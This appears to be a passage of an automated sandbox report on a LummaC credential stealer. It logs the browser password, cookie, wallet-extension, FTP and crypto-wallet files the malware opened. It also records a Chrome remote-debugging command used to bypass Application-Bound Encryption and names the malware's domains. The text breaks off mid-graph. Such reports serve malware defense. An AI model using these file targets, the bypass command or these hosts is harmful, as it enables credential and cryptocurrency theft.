Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: number of queries: 1002
Yara detected Credential Stealer
Source: Yara match File source: 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 9160, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: powershell.exe PID: 9160, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579348 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 41 surmisehotte.click 2->41 43 savecoupons.shop 2->43 45 journal.liveview.pw 2->45 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 12 other signatures 2->67 12 cmd.exe 1 2->12         started        signatures3 process4 process5 14 mshta.exe 17 12->14         started        18 conhost.exe 12->18         started        dnsIp6 59 savecoupons.shop 172.67.223.7, 443, 49754 CLOUDFLARENETUS United States 14->59 87 Suspicious powershell command line found 14->87 20 powershell.exe 18 14->20         started        signatures7 process8 signatures9 69 Attempt to bypass Chrome Application-Bound Encryption 20->69 71 Suspicious powershell command line found 20->71 73 Found many strings related to Crypto-Wallets (likely being stolen) 20->73 75 3 other signatures 20->75 23 powershell.exe 15 16 20->23         started        27 conhost.exe 20->27         started        process10 dnsIp11 53 journal.liveview.pw 104.21.37.173, 443, 49755 CLOUDFLARENETUS United States 23->53 77 Injects a PE file into a foreign processes 23->77 29 powershell.exe 23->29         started        33 